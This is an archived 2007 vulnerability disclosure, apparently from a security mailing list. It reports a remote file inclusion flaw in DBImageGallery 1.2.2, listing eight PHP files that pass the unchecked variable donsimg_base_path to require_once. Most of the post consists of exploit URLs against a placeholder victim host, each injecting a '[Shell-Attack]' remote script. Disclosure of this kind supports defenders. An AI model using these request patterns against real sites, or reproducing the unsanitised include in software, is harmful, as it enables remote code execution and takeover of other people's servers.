Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) BJ Webring XSS Tyger Bug Tracking System Multiple Vulnerability WordPress source code compromised to enable remote code execution From:RaeD Hasadya <raed_(at)_bsdmail.com> Date:03.03.2007Subject:Remote File Include In DBImageGalleryRemote File Include In DBImageGallery 1.2.2 Discovered By : Hasadya Raed Contact Me : RaeD@BsdMail.Com Download Script : http://www.dbscripts.net/download/?file=1 B.Files: admin/attributes.php -> require_once $donsimg_base_path admin/images.php -> require_once $donsimg_base_path admin/scan.php -> require_once $donsimg_base_path includes/attributes.php -> require_once $donsimg_base_path includes/db_utils.php -> require_once $donsimg_base_path includes/images.php -> require_once $donsimg_base_path includes/utils.php -> require_once $donsimg_base_path includes/values.php -> require_once $donsimg_base_path Exploits : http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack] -- _______________________________________________ Get your free email from http://bsdmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
BJ Webring XSS
Tyger Bug Tracking System Multiple Vulnerability
WordPress source code compromised to enable remote code execution
